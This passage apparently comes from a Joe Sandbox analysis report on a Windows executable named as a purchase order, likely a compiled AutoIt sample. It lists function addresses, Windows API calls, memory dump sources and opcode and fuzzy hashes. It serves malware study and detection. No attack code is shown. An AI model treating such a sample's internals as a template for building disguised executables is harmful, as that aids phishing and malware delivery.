                                  • API ID: DialogNtdllProc_
                                  • String ID:
                                  • API String ID: 3239928679-0
                                  • Opcode ID: c8074131f37bb21e52515d0e719f0e6372a069fb1b0bf1c5daab0305562a1656
                                  • Instruction ID: cdfa3c7c0e358d42617837c3919da1626915cb286f17707c0539985eb8f146ed
                                  • Opcode Fuzzy Hash: c8074131f37bb21e52515d0e719f0e6372a069fb1b0bf1c5daab0305562a1656
                                  • Instruction Fuzzy Hash: DFE0B675240248AFD700DF48D898D9A77A9EB89700F048458FA554B3A2C6B0B810CB61
                                  Function 0047132F Relevance: 1.5, APIs: 1, Instructions: 17nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00470928: DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                  • NtdllDialogWndProc_W.USER32(?,00000002,00000000,00000000), ref: 0047134E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: AcceleratorDestroyDialogNtdllProc_Table
                                  • String ID:
                                  • API String ID: 2638641937-0
                                  • Opcode ID: 1fe523bc3ffe7451472abd685aad30700db2524a9dbb340e0d67ef59a1e13db2
                                  • Instruction ID: 049d54cb1fe6716e8d8a3831c4e241097285c9e82ec9b29a3d6a302b973cbdb4
                                  • Opcode Fuzzy Hash: 1fe523bc3ffe7451472abd685aad30700db2524a9dbb340e0d67ef59a1e13db2
                                  • Instruction Fuzzy Hash: 33D012B26C2324B6E51036965D1BFCFFA5CCF1ABA1F108017F704B60C289E9640086FD
                                  Function 00440338 Relevance: 1.5, APIs: 1, Instructions: 17nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtdllDialogWndProc_W.USER32(?,00000211), ref: 00440360
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: DialogNtdllProc_
                                  • String ID:
                                  • API String ID: 3239928679-0
                                  • Opcode ID: 5f87cae89cac6f8e2d25e27d115a3a7f1dea2ab8eb24d34981d9022fbff52b9c
                                  • Instruction ID: 3c6c68f393c460ac128c5d0723b5b392c07b23a02b9a2d0c15d00fa147821f68
                                  • Opcode Fuzzy Hash: 5f87cae89cac6f8e2d25e27d115a3a7f1dea2ab8eb24d34981d9022fbff52b9c
                                  • Instruction Fuzzy Hash: A4E0EC75240248AFDB00DF48D898E9B77A9FB89700F048458FA554B3A2C7B0F810CFA1
                                  Function 00472C3F Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: NameUser
                                  • String ID:
                                  • API String ID: 2645101109-0
                                  • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                  • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                  • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                  • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                  Function 0041F250 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled
                                  • String ID:
                                  • API String ID: 3192549508-0
                                  • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                  • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                  • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                  • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                  Function 0042200C Relevance: 1.4, Strings: 1, Instructions: 180COMMONLIBRARYCODE
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: N@
                                  • API String ID: 0-1509896676
                                  • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                  • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                  • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                  • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                  Function 0040FA10 Relevance: .6, Instructions: 607COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                  • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                  • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                  • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                  Function 004129D0 Relevance: .4, Instructions: 355COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                  • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                  • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                  • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                  Function 004125E8 Relevance: .3, Instructions: 349COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                  • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                  • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                  • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                  Function 00412216 Relevance: .3, Instructions: 332COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                  • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                  • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                  • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                  Function 004594E9 Relevance: 79.2, APIs: 41, Strings: 4, Instructions: 490filewindowcomCOMMON
                                  Download Yara Rule
                                  APIs
                                  • DeleteObject.GDI32(?), ref: 0045953B
                                  • DeleteObject.GDI32(?), ref: 00459551
                                  • 74285CF0.USER32(?), ref: 00459563
                                  • GetDesktopWindow.USER32 ref: 00459581
                                  • GetWindowRect.USER32(00000000), ref: 00459588
                                  • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                  • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                  • GetClientRect.USER32(00000000,?), ref: 004596F8
                                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                  • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                  • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                  • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                  • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                  • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                  • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                  • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                  • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                  • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                  • ShowWindow.USER32(?,00000004), ref: 00459865
                                  • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                  • 742861E0.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                  • GetStockObject.GDI32(00000011), ref: 004598CD
                                  • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                  • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                  • 74284620.GDI32(00000000,0000005A), ref: 004598EE
                                  • DeleteDC.GDI32(00000000), ref: 004598F8
                                  • _wcslen.LIBCMT ref: 00459916
                                  • _wcscpy.LIBCMT ref: 0045993A
                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                  • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                  • 7427A570.USER32(00000000,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599FC
                                  • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                  • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                  • 7427A480.USER32(00000000,00000000), ref: 00459A42
                                  • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                  • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Window$CreateObject$Global$Rect$DeleteFileSelect$7427MessageSendShow$7428462074285742861A480A570AdjustAllocClientCloseCopyDesktopFaceFontFreeHandleImageLoadLockMovePictureReadSizeStockStreamTextUnlock_wcscpy_wcslen
                                  • String ID: $AutoIt v3$DISPLAY$static
                                  • API String ID: 1129336510-2373415609
                                  • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                  • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                  • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                  • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                  Function 004417BF Relevance: 49.8, APIs: 33, Instructions: 275COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetSysColor.USER32(00000012), ref: 0044181E
                                  • SetTextColor.GDI32(?,?), ref: 00441826
                                  • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                  • GetSysColor.USER32(0000000F), ref: 00441849
                                  • SetBkColor.GDI32(?,?), ref: 00441864
                                  • SelectObject.GDI32(?,?), ref: 00441874
                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                  • GetSysColor.USER32(00000010), ref: 004418B2
                                  • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                  • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                  • DeleteObject.GDI32(?), ref: 004418D5
                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                  • FillRect.USER32(?,?,?), ref: 00441970
                                    • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                    • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                    • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                    • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                    • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                    • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                    • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                    • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                    • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                    • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                    • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                    • Part of subcall function 004308EF: 742845F0.USER32(?,000000F0), ref: 00430A09
                                    • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$742845DeleteFillFrameMessageRoundSendSolid
                                  • String ID:
                                  • API String ID: 2652913774-0
                                  • Opcode ID: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                  • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                  • Opcode Fuzzy Hash: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                  • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                  Function 004590BD Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 291windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • 74285CF0.USER32(?), ref: 004590F2
                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                  • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                  • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                  • GetClientRect.USER32(00000000,?), ref: 0045924E
                                  • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                  • 742861E0.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                  • GetStockObject.GDI32(00000011), ref: 004592AC
                                  • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                  • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                  • 74284620.GDI32(00000000,0000005A), ref: 004592CD
                                  • DeleteDC.GDI32(00000000), ref: 004592D6
                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                  • GetStockObject.GDI32(00000011), ref: 004593D3
                                  • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                  • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$7428462074285742861AdjustClientDeleteFaceFontInfoParametersSelectShowSystemText
                                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                  • API String ID: 1752801206-517079104
                                  • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                  • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                  • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                  • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                  Function 00403A20 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 238COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
